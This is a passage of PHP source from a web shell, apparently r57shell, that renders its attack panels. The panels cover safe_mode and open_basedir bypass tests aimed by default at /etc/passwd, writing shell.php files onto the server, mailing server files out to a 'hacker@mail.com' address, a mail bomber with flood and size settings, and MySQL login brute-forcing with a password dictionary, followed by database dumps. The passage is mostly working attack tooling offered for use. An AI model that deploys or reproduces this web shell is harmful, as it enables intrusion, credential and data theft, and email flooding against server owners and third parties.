echo sr(15, "" . $lang[$language . '_text3'] . $arrow . "", in('text', 'test4_file', 96, (!empty($_POST['test4_file']) ? ($_POST['test4_file']) : ("dir"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text112'], 'id15') . $table_up2 . div('id15') . $ts;
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test5_file', 96, (!empty($_POST['test5_file']) ? ($_POST['test5_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test5') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text113'], 'id20') . $table_up2 . div('id20') . $ts;
echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test6_file', 96, (!empty($_POST['test6_file']) ? ($_POST['test6_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test6') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text114'], 'id21') . $table_up2 . div('id21') . $ts;
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test7_file', 96, (!empty($_POST['test7_file']) ? ($_POST['test7_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test7') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text115'], 'id22') . $table_up2 . div('id22') . $ts;
echo sr(15, "" . $lang[$language . '_text116'] . $arrow . "", in('text', 'test8_file1', 96, (!empty($_POST['test8_file1']) ? ($_POST['test8_file1']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test8'));
echo sr(15, "" . $lang[$language . '_text117'] . $arrow . "", in('text', 'test8_file2', 96, (!empty($_POST['test8_file2']) ? ($_POST['test8_file2']) : ($dir))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text120'], 'id23') . $table_up2 . div('id23') . $ts;
echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test9_file', 96, (!empty($_POST['test9_file']) ? ($_POST['test9_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test9') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.0.0") < 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text121'], 'id24') . $table_up2 . div('id24') . $ts;
echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test10_file', 96, (!empty($_POST['test10_file']) ? ($_POST['test10_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test10') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text122'], 'id19') . $table_up2 . div('id19') . $ts;
echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'dir', 96, (!empty($_POST['test18_file']) ? ($_POST['test18_file']) : ($dir))) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text130'], 'id25') . $table_up2 . div('id25') . $ts;
echo sr(15, "" . $lang[$language . '_text116'] . $arrow . "", in('text', 'test11_file', 96, (!empty($_POST['test11_file']) ? ($_POST['test11_file']) : ("/tmp/test.zip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test11') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text123'], 'id26') . $table_up2 . div('id26') . $ts;
echo sr(15, "" . $lang[$language . '_text116'] . $arrow . "", in('text', 'test12_file', 96, (!empty($_POST['test12_file']) ? ($_POST['test12_file']) : ("/tmp/test.bzip"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test12') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text124'], 'id27') . $table_up2 . div('id27') . $ts;
echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test13_file2', 96, (!empty($_POST['test13_file2']) ? ($_POST['test13_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test13'));
echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test13_file1', 96, (!empty($_POST['test13_file1']) ? ($_POST['test13_file1']) : ("
"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text126'], 'id28') . $table_up2 . div('id28') . $ts;
echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test14_file2', 96, (!empty($_POST['test14_file2']) ? ($_POST['test14_file2']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test14'));
echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test14_file1', 96, (!empty($_POST['test14_file1']) ? ($_POST['test14_file1']) : ("
"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text127'], 'id29') . $table_up2 . div('id29') . $ts;
echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test15_file2', 96, (!empty($_POST['test15_file2']) ? ($_POST['test15_file2']) : ($dir . "/shell.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test15'));
echo sr(15, "" . $lang[$language . '_text125'] . $arrow . "", in('text', 'test15_file1', 96, (!empty($_POST['test15_file1']) ? ($_POST['test15_file1']) : ("
"))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt10']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.4") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text129'], 'id16') . $table_up2 . div('id16') . $ts;
echo sr(15, "" . $lang[$language . '_text65'] . " " . $lang[$language . '_text59'] . $arrow . "", in('text', 'test16_file', 96, (!empty($_POST['test16_file']) ? ($_POST['test16_file']) : ($dir . "/test.php"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test16') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8']));
echo $te . '' . $table_end1 . $fe;
} if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $table_up1 . div_title($lang[$language . '_text131'], 'id17') . $table_up2 . div('id17') . $ts;
echo "| " . $ts;
echo sr(20, "" . $lang[$language . '_text30'] . $arrow . "", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
echo $te . " | " . $ts;
echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_2') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
echo $te . " | ";
echo $te . '' . $table_end1;
} if (($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $table_up1 . div_title($lang[$language . '_text132'], 'id18') . $table_up2 . div('id18') . $ts;
echo "| " . $ts;
echo sr(20, "" . $lang[$language . '_text4'] . $arrow . "", $fs . in('text', 'test17_file', 60, (!empty($_POST['test17_file']) ? ($_POST['test17_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_1') . in('submit', 'submit', 0, $lang[$language . '_text136']) . $fe);
echo $te . " | " . $ts;
echo sr(0, "", $fs . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test17_3') . in('submit', 'submit', 0, $lang[$language . '_butt8']) . $fe);
echo $te . " | ";
echo $te . '' . $table_end1;
} if ((!@function_exists('ini_get')) || @ini_get('file_uploads')) { echo " ";
} if (@function_exists("mail")) { echo $table_up1 . div_title($lang[$language . '_text102'], 'id35') . $table_up2 . div('id35') . $ts . "" . $fs . "| " . $ts;
echo " " . $lang[$language . '_text103'] . " ";
echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir));
echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
echo sr(25, "" . $lang[$language . '_text108'] . $arrow . "", '');
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . " | " . $fe . $fs . "" . $ts;
echo " " . $lang[$language . '_text104'] . " ";
echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir));
echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("file from r57shell"))));
echo sr(25, "" . $lang[$language . '_text18'] . $arrow . "", in('text', 'loc_file', 30, $dir));
echo sr(25, "" . $lang[$language . '_text91'] . $arrow . "", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh);
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . " | " . $fe . $fs . "" . $ts;
echo " " . $lang[$language . '_text139'] . " ";
echo sr(25, "" . $lang[$language . '_text105'] . $arrow . "", in('text', 'to', 30, (!empty($_POST['to']) ? ($_POST['to']) : ("hacker@mail.com"))) . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir));
echo sr(25, "" . $lang[$language . '_text106'] . $arrow . "", in('text', 'from', 30, (!empty($_POST['from']) ? ($_POST['from']) : ("billy@microsoft.com"))));
echo sr(25, "" . $lang[$language . '_text107'] . $arrow . "", in('text', 'subj', 30, (!empty($_POST['subj']) ? ($_POST['subj']) : ("hello billy"))));
echo sr(25, "" . $lang[$language . '_text108'] . $arrow . "", '');
echo sr(25, "Flood" . $arrow . "", in('int', 'mail_flood', 5, (!empty($_POST['mail_flood']) ? ($_POST['mail_flood']) : 100)) . ws(4) . "Size(kb)" . $arrow . "" . in('int', 'mail_size', 5, (!empty($_POST['mail_size']) ? ($_POST['mail_size']) : 10)));
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15']));
echo $te . " | " . $fe . " ";
} if ($mysql_on || $mssql_on || $pg_on || $ora_on) { $select = '';
echo $table_up1 . div_title($lang[$language . '_text82'], 'id36') . $table_up2 . div('id36') . $ts . "" . $fs . "| " . $ts;
echo " " . $lang[$language . '_text134'] . " ";
echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_brute'));
echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "" . $lang[$language . '_text39'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
echo sr(25, "", in('radio', 'brute_method', 0, 'passwd', 1) . "" . $lang[$language . '_text99'] . " ( " . $lang[$language . '_text95'] . " )");
echo sr(25, "", in('checkbox', 'reverse id=reverse', 0, '1', 1) . $lang[$language . '_text101']);
echo sr(25, "", in('radio', 'brute_method', 0, 'dic', 0) . $lang[$language . '_text135']);
echo sr(35, "" . $lang[$language . '_text37'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))));
echo sr(25, "" . $lang[$language . '_text135'] . $arrow . "", in('text', 'dictionary', 0, (!empty($_POST['dictionary']) ? ($_POST['dictionary']) : ($dir . '/passw.dic'))));
echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt1']));
echo $te . " | " . $fe . $fs . "" . $ts;
echo " " . $lang[$language . '_text83'] . " ";
echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select);
echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' : ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
echo sr(35, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))) . ' . ' . in('text', 'mysql_tbl', 8, (!empty($_POST['mysql_tbl']) ? ($_POST['mysql_tbl']) : ("user"))));
echo sr(35, in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'mysql_dump') . "" . $lang[$language . '_text41'] . $arrow . "", in('checkbox', 'dif id=dif', 0, '1') . in('text', 'dif_name', 17, (!empty($_POST['dif_name']) ? ($_POST['dif_name']) : ("dump.sql"))));
echo sr(35, "", in('submit', 'submit', 0, $lang[$language . '_butt9']));
echo $te . " | " . $fe . $fs . "" . $ts;
echo " " . $lang[$language . '_text83'] . " ";
echo sr(35, "" . $lang[$language . '_text80'] . $arrow . "", $select);
echo sr(35, "" . $lang[$language . '_text111'] . $arrow . "", in('text', 'db_server', 8, (!empty($_POST['db_server']) ? ($_POST['db_server']) : ("localhost"))) . ' : ' . in('text', 'db_port', 8, (!empty($_POST['db_port']) ? ($_POST['db_port']) : ("3306"))));
echo sr(35, "" . $lang[$language . '_text37'] . ' : ' . $lang[$language . '_text38'] . $arrow . "", in('text', 'mysql_l', 8, (!empty($_POST['mysql_l']) ? ($_POST['mysql_l']) : ("root"))) . ' : ' . in('text', 'mysql_p', 8, (!empty($_POST['mysql_p']) ? ($_POST['mysql_p']) : ("password"))));
echo sr(35, "" . $lang[$language . '_text39'] . $arrow . "", in('text', 'mysql_db', 8, (!empty($_POST['mysql_db']) ? ($_POST['mysql_db']) : ("mysql"))));
echo sr(35, "" . $lang[$language . '_text84'] . $arrow . "" . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_query'), "");
echo $te . "
" . in('submit', 'submit', 0, $lang[$language . '_butt1']) . "
";
echo " | " . $fe . "
";
} if (!$safe_mode && $unix) { echo $table_up1 . div_title($lang[$language . '_text81'], 'id37') . $table_up2 . div('id37') . $ts . " |